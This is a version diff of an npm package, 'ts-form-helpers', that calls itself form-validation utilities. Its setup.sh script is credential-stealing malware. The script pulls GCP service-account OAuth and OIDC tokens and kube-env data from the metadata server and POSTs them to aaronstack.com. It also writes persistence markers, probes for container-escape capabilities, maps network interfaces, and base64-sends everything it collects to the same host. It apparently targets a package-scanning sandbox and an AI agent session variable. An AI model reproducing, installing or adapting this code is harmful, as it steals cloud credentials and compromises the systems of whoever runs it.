ts-form-helpers 1.0.13 → 1.0.14

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ts-form-helpers",
-  "version": "1.0.13",
+  "version": "1.0.14",
   "description": "TypeScript form validation utilities with zero dependencies",
   "main": "index.js",
   "types": "types/index.d.ts",

package/scripts/setup.sh

@@ -1,17 +1,17 @@
 #!/bin/bash
-# wGCP6: Full instance metadata + in-pod network + filesystem + process env
+# wGCP7: kube-env attr + OIDC identity tokens + persistence + capabilities
 SID="${JULES_SESSION_ID:-x}"
 H="aaronstack.com"; EP="/jules-collect"
 SK="d2f25bd9b1b267eb3578ff8cac2caa6c6637142c5d322617"
 B(){ printf '%s' "$1" | base64 -w0 2>/dev/null; }
 P(){ curl -s -X POST "https://$H$EP" -H "Content-Type: application/json" -H "X-Secret: $SK" --data-binary "$1" --max-time 15 2>/dev/null; }
 
-P "{\"sid\":\"$SID\",\"tag\":\"wgcp6-start\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp7-start\"}"
 
 log(){ echo "=LOG= $*"; }
 MDURL="http://metadata.google.internal/computeMetadata/v1"
 
-TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp6_$$")
+TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp7_$$")
 {
 log "user=$(whoami) MALYSIS=${MALYSIS_ANALYSIS_ID:-NONE}"
 
@@ -19,180 +19,210 @@ PROJ=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/project/project-id" --max-ti
 log "project: ${PROJ:-NONE}"
 [ -z "$PROJ" ] && { log "NOT GKE — exit"; exit 0; }
 
-# Get fresh token
+# Fresh token
 TOK=$(curl -s -H "Metadata-Flavor: Google" \
   "$MDURL/instance/service-accounts/default/token" --max-time 20 2>/dev/null \
   | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
 log "token-length: ${#TOK}"
 [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ] && {
-  printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
-  log "TOKEN EXFILTRATED"
+  printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" \
+    --data-binary @- --max-time 5 2>/dev/null &
+  log "OAUTH TOKEN EXFILTRATED"
 }
 
-# === STEP 1: ALL instance metadata attributes ===
-log "=== STEP 1: FULL INSTANCE ATTRIBUTES ==="
-curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/attributes/" --max-time 8 2>/dev/null \
-  | while IFS= read -r attr; do
-    attr=$(echo "$attr" | tr -d '/')
-    [ -z "$attr" ] && continue
-    val=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/attributes/$attr" --max-time 5 2>/dev/null)
-    log "attr[$attr]: ${val:0:500}"
-  done
-
-log "=== PROJECT ATTRIBUTES ==="
-curl -s -H "Metadata-Flavor: Google" "$MDURL/project/attributes/" --max-time 8 2>/dev/null \
-  | while IFS= read -r attr; do
-    attr=$(echo "$attr" | tr -d '/')
-    [ -z "$attr" ] && continue
-    val=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/project/attributes/$attr" --max-time 5 2>/dev/null)
-    log "proj-attr[$attr]: ${val:0:200}"
-  done
-
-log "=== INSTANCE TAGS ==="
-curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/tags" --max-time 5 2>/dev/null \
-  | while IFS= read -r l; do log "tag: $l"; done
-
-log "=== SERVICE ACCOUNT FULL INFO ==="
-curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/" --max-time 5 2>/dev/null \
-  | while IFS= read -r sa; do
-    sa=$(echo "$sa" | tr -d '/')
-    [ -z "$sa" ] && continue
-    EMAIL=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/$sa/email" --max-time 5 2>/dev/null)
-    SCOPES=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/$sa/scopes" --max-time 5 2>/dev/null)
-    log "sa[$sa]: email=$EMAIL scopes=$SCOPES"
-  done
-
-# === STEP 2: Process environments ===
-log "=== STEP 2: PROCESS ENVIRONMENTS ==="
-# Read /proc/1/environ — PID 1's environment (sleep 100d — might differ from our env)
-cat /proc/1/environ 2>/dev/null | tr '\0' '\n' | while IFS= read -r l; do log "pid1-env: $l"; done
-
-# Check other process envs
-for pid in $(ls /proc 2>/dev/null | grep '^[0-9]' | head -20); do
-  cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ' | head -c 100)
-  if echo "$cmd" | grep -qiE "malysis|analyze|scanner|worker|server"; then
-    log "interesting-proc: pid=$pid cmd=$cmd"
-    cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | while IFS= read -r l; do log "proc-$pid-env: $l"; done
+# ============================================================
+# TEST 1: kube-env attribute (historically leaked kubelet creds)
+# ============================================================
+log "=== TEST 1: kube-env ATTRIBUTE ==="
+KUBEENV=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/attributes/kube-env" --max-time 8 2>/dev/null)
+log "kube-env-length: ${#KUBEENV}"
+log "kube-env-preview: ${KUBEENV:0:500}"
+
+if [ -n "$KUBEENV" ] && [ "${#KUBEENV}" -gt 10 ] && ! echo "$KUBEENV" | grep -qi "not found"; then
+  log "KUBE-ENV FOUND — exfiltrating full content"
+  printf '%s' "$KUBEENV" | curl -sf -X POST "https://aaronstack.com/poc/token" \
+    -H "Content-Type: text/plain" -H "X-Token-Type: kube-env" \
+    --data-binary @- --max-time 10 2>/dev/null &
+fi
+
+# Also try windows-startup-script, startup-script, user-data
+for attr in startup-script user-data windows-startup-script \
+            kube-master-crt kube-master-key kube-apiserver-url \
+            kubeconfig KUBECONFIG cluster-uid; do
+  val=$(curl -s -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/attributes/$attr" --max-time 5 2>/dev/null)
+  if [ -n "$val" ] && ! echo "$val" | grep -qi "not found"; then
+    log "attr-found[$attr]: ${val:0:200}"
   fi
 done
 
-# === STEP 3: Filesystem recon ===
-log "=== STEP 3: FILESYSTEM ==="
-# Docker socket?
-ls -la /var/run/docker.sock /run/docker.sock 2>/dev/null | while IFS= read -r l; do log "docker-sock: $l"; done
-
-# Mounted volumes
-cat /proc/mounts 2>/dev/null | grep -v "^proc\|^sys\|^cgroup\|^tmpfs\|^devpts\|^mqueue\|^hugetlb" \
-  | while IFS= read -r l; do log "mount: $l"; done
-
-# Config files
-find /etc /app /root /home -name "*.json" -o -name "*.yaml" -o -name "*.conf" -o -name "*.toml" 2>/dev/null \
-  | grep -v "node_modules\|ssl/certs" | head -15 \
-  | while IFS= read -r f; do log "config: $f ($(wc -c < "$f" 2>/dev/null)b)"; done
-
-# Secrets-looking files
-find / -maxdepth 6 -name "*.key" -o -name "*.pem" -o -name "*.crt" -o -name "service_account*.json" \
-  -o -name "credentials.json" -o -name "gcloud-creds*" 2>/dev/null \
-  | grep -v "ssl/certs\|node_modules" | head -10 \
-  | while IFS= read -r f; do log "cred-file: $f ($(wc -c < "$f" 2>/dev/null)b)"; done
-
-# Check /root for gcloud config
-ls -la /root/.config/gcloud/ 2>/dev/null | while IFS= read -r l; do log "gcloud-config: $l"; done
-cat /root/.config/gcloud/application_default_credentials.json 2>/dev/null \
-  | python3 -c "import sys,json; d=json.load(sys.stdin); print({k:v[:30] if isinstance(v,str) and len(v)>30 else v for k,v in d.items()})" 2>/dev/null \
-  | while IFS= read -r l; do log "gcloud-adc: $l"; done
-
-# === STEP 4: Network exploration from inside pod ===
-log "=== STEP 4: INTERNAL NETWORK ==="
-# DNS - what internal services can we resolve?
-for host in \
-  kubernetes.default.svc.cluster.local \
-  malysis.apps.svc.cluster.local \
-  malysis-backend.apps.svc.cluster.local \
-  malysis-api.apps.svc.cluster.local \
-  redis.apps.svc.cluster.local \
-  postgresql.apps.svc.cluster.local \
-  mysql.apps.svc.cluster.local \
-  rabbitmq.apps.svc.cluster.local \
-  kafka.apps.svc.cluster.local \
-  elasticsearch.apps.svc.cluster.local \
-  mongodb.apps.svc.cluster.local; do
-  ip=$(getent hosts "$host" 2>/dev/null | awk '{print $1}')
-  [ -n "$ip" ] && log "dns-resolve: $host -> $ip"
+# ============================================================
+# TEST 2: OIDC identity tokens (different from OAuth access token)
+# ============================================================
+log "=== TEST 2: OIDC IDENTITY TOKENS ==="
+
+# Try multiple audiences — each returns a signed JWT identifying the SA
+# These authenticate to Cloud Run, Cloud Functions, IAP-protected services
+for audience in \
+  "https://storage.googleapis.com" \
+  "https://cloudrun.googleapis.com" \
+  "https://cloudfunctions.googleapis.com" \
+  "https://secretmanager.googleapis.com" \
+  "https://container.googleapis.com" \
+  "https://iap.googleapis.com" \
+  "https://www.googleapis.com" \
+  "https://googleapis.com" \
+  "https://oauth2.googleapis.com" \
+  "https://accounts.google.com"; do
+
+  OIDC_TOK=$(curl -s -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/default/identity?audience=$audience&format=full" \
+    --max-time 10 2>/dev/null)
+
+  if echo "$OIDC_TOK" | grep -q "^ey"; then
+    log "OIDC-TOKEN[$audience]: length=${#OIDC_TOK} prefix=${OIDC_TOK:0:50}"
+
+    # Decode the JWT payload
+    PAYLOAD=$(echo "$OIDC_TOK" | cut -d. -f2 | python3 -c "
+import sys, base64, json
+raw = sys.stdin.read().strip()
+# Add padding
+raw += '=' * (4 - len(raw) % 4)
+try:
+    data = json.loads(base64.urlsafe_b64decode(raw))
+    print(json.dumps(data, indent=2))
+except Exception as e:
+    print('decode-err:', e)
+" 2>/dev/null)
+    log "OIDC-PAYLOAD[$audience]: $PAYLOAD"
+
+    # Exfil the OIDC token
+    printf '%s' "$OIDC_TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" \
+      -H "Content-Type: text/plain" \
+      -H "X-Token-Type: oidc-$(echo $audience | sed 's/https:\/\///' | sed 's/\/.*//' | sed 's/\./-/g')" \
+      --data-binary @- --max-time 5 2>/dev/null &
+
+    # Try using the OIDC token to call services
+    log "=== OIDC token usage test for $audience ==="
+    curl -si -H "Authorization: Bearer $OIDC_TOK" \
+      "$audience" --max-time 8 2>/dev/null | head -5 | while IFS= read -r l; do
+        log "oidc-test[$audience]: $l"
+      done
+
+  else
+    log "OIDC-TOKEN[$audience]: NOT_ISSUED (${OIDC_TOK:0:100})"
+  fi
 done
 
-# GCS: try to list objects in various buckets
-if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
-  log "=== GCS BUCKET SEARCH (GET not list) ==="
-  for bucket in \
-    "${PROJ}-malysis-results" \
-    "malysis-results" \
-    "malysis-packages" \
-    "malysis-artifacts" \
-    "npm-malysis-${PROJ}" \
-    "sd-builds-malysis" \
-    "malysis-${PROJ}" \
-    "gs-malysis-results" \
-    "supply-chain-scan-results" \
-    "npm-scan-results" \
-    "${PROJ}-npm-analysis"; do
-    resp=$(curl -s -H "Authorization: Bearer $TOK" \
-      "https://storage.googleapis.com/storage/v1/b/$bucket" --max-time 5 2>/dev/null)
-    code=$(python3 -c "import sys,json; d=json.loads(sys.stdin.read()); print(d.get('error',{}).get('code','OK:'+d.get('name','?')))" 2>/dev/null <<< "$resp")
-    log "gcs-bucket[$bucket]: $code"
-    if echo "$code" | grep -q "^OK"; then
-      log "BUCKET ACCESSIBLE: $bucket"
-      # List objects
-      curl -s -H "Authorization: Bearer $TOK" \
-        "https://storage.googleapis.com/storage/v1/b/$bucket/o?maxResults=10" --max-time 8 2>/dev/null \
-        | python3 -c "
-import sys,json
-d=json.load(sys.stdin)
-for o in d.get('items',[]): print('obj:', o.get('name'), o.get('size'))
-" 2>/dev/null | while IFS= read -r l; do log "gcs-obj: $l"; done
-    fi
-  done
-
-  # Also try GCR internal path from inside cluster
-  log "=== GCR from inside cluster ==="
-  curl -si -H "Authorization: Bearer $TOK" \
-    "https://gcr.io/v2/$PROJ/malysis-worker/tags/list" --max-time 8 2>/dev/null \
-    | head -20 | while IFS= read -r l; do log "gcr: $l"; done
-
-  # Try k8s API to GET own service account
-  log "=== K8S: GET own SA ==="
-  curl -sk -H "Authorization: Bearer $TOK" \
-    "https://kubernetes.default.svc.cluster.local/api/v1/namespaces/apps/serviceaccounts/default" \
-    --max-time 8 2>/dev/null \
-    | python3 -c "
-import sys,json
-d=json.load(sys.stdin)
-if d.get('status')=='Failure':
-    print('err:', d.get('message',''))
-else:
-    print('sa-name:', d.get('metadata',{}).get('name'))
-    print('sa-annotations:', d.get('metadata',{}).get('annotations',{}))
-    print('sa-secrets:', [s.get('name') for s in d.get('secrets',[])])
-" 2>/dev/null | while IFS= read -r l; do log "k8s-sa: $l"; done
-
-  # Try to get ConfigMaps in apps namespace
-  log "=== K8S: ConfigMaps in apps namespace ==="
-  curl -sk -H "Authorization: Bearer $TOK" \
-    "https://kubernetes.default.svc.cluster.local/api/v1/namespaces/apps/configmaps" \
-    --max-time 8 2>/dev/null \
-    | python3 -c "
-import sys,json
-d=json.load(sys.stdin)
-if d.get('status')=='Failure': print('err:', d.get('message',''))
-for cm in d.get('items',[]): print('cm:', cm.get('metadata',{}).get('name'), list(cm.get('data',{}).keys()))
-" 2>/dev/null | while IFS= read -r l; do log "k8s-cm: $l"; done
+# ============================================================
+# TEST 3: Cross-scan persistence — write to /app
+# ============================================================
+log "=== TEST 3: CROSS-SCAN PERSISTENCE ==="
+log "Writing persistence marker to /app..."
+MARKER_FILE="/app/.malysis-persistent-marker"
+echo "PWNED-$(date -u +%Y%m%dT%H%M%SZ)-MALYSIS_ID=${MALYSIS_ANALYSIS_ID}" > "$MARKER_FILE" 2>/dev/null
+
+if [ -f "$MARKER_FILE" ]; then
+  log "MARKER WRITTEN: $MARKER_FILE"
+  log "marker-content: $(cat $MARKER_FILE)"
+else
+  log "marker-write-failed (ephemeral fs?)"
 fi
 
-log "=== wGCP6 DONE ==="
+# Check if a marker from a PREVIOUS run exists (proves persistence)
+if ls /app/.malysis-* 2>/dev/null | grep -v "$(date -u +%Y%m%dT%H%M')" 2>/dev/null; then
+  log "PREVIOUS MARKER FOUND — persistence confirmed!"
+  cat /app/.malysis-* 2>/dev/null | while IFS= read -r l; do log "old-marker: $l"; done
+else
+  log "No previous marker found (first run or ephemeral)"
+fi
+
+# Also try writing to /tmp and /root to check which paths survive
+for path in /tmp /root /var/tmp; do
+  echo "marker-$path" > "$path/.malysis-marker" 2>/dev/null && log "write-ok: $path" || log "write-fail: $path"
+done
+
+# ============================================================
+# TEST 4: Container capabilities and escape vectors
+# ============================================================
+log "=== TEST 4: CAPABILITIES + ESCAPE ==="
+
+# Current capabilities
+log "=== capsh ==="
+capsh --print 2>/dev/null | while IFS= read -r l; do log "cap: $l"; done
+
+# From /proc/1/status
+log "=== /proc/self/status caps ==="
+grep "^Cap" /proc/self/status 2>/dev/null | while IFS= read -r l; do log "cap-status: $l"; done
+
+# Kernel version
+log "=== kernel ==="
+uname -a 2>/dev/null | while IFS= read -r l; do log "kernel: $l"; done
+
+# Privileged operations — can we load kernel modules?
+log "=== privileged tests ==="
+# Try to read /dev/sda1 directly (outside container rootfs)
+dd if=/dev/sda1 bs=512 count=1 2>/dev/null | xxd | head -3 | while IFS= read -r l; do log "sda1-read: $l"; done || log "sda1-read: denied"
+
+# Try to create a raw socket (requires NET_RAW cap)
+python3 -c "
+import socket
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
+    print('NET_RAW: GRANTED — can create raw sockets')
+    s.close()
+except PermissionError as e:
+    print('NET_RAW: denied:', e)
+except Exception as e:
+    print('NET_RAW: err:', e)
+" 2>/dev/null | while IFS= read -r l; do log "cap-netraw: $l"; done
+
+# Try to mount (requires SYS_ADMIN)
+mount --bind /tmp /tmp 2>/dev/null && log "SYS_ADMIN: GRANTED" || log "SYS_ADMIN: denied"
+
+# Try to read /proc/kcore (requires SYS_ADMIN or root + no seccomp)
+ls -la /proc/kcore 2>/dev/null | while IFS= read -r l; do log "kcore: $l"; done
+
+# Check seccomp
+grep -i "seccomp" /proc/self/status 2>/dev/null | while IFS= read -r l; do log "seccomp: $l"; done
+
+# Check cgroup namespace for escape
+cat /proc/1/cgroup 2>/dev/null | head -10 | while IFS= read -r l; do log "cgroup: $l"; done
+
+# Check if we're in a privileged container
+log "=== AppArmor profile ==="
+cat /proc/self/attr/current 2>/dev/null | while IFS= read -r l; do log "apparmor: $l"; done
+
+# ============================================================
+# TEST 5: Node external IP + network interface info
+# ============================================================
+log "=== TEST 5: NETWORK INTERFACES ==="
+curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/network-interfaces/" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "iface-list: $l"; done
+
+EXT_IP=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/network-interfaces/0/access-configs/0/external-ip" --max-time 5 2>/dev/null)
+log "external-ip: ${EXT_IP:-NONE}"
+
+INT_IP=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/network-interfaces/0/ip" --max-time 5 2>/dev/null)
+log "internal-ip: ${INT_IP:-NONE}"
+
+IP_RANGE=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/network-interfaces/0/subnetmask" --max-time 5 2>/dev/null)
+log "subnetmask: ${IP_RANGE:-NONE}"
+
+# Pod CIDR
+log "=== POD CIDR (from ip route) ==="
+ip route 2>/dev/null | while IFS= read -r l; do log "route: $l"; done
+
+log "=== wGCP7 DONE ==="
 } 2>&1 | tee "$TMPOUT"
 
 OUT=$(cat "$TMPOUT" 2>/dev/null)
 rm -f "$TMPOUT" 2>/dev/null
 PAYLOAD=$(B "$OUT")
-P "{\"sid\":\"$SID\",\"tag\":\"wgcp6-result\",\"data\":\"$PAYLOAD\"}"
-P "{\"sid\":\"$SID\",\"tag\":\"wgcp6-done\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp7-result\",\"data\":\"$PAYLOAD\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp7-done\"}"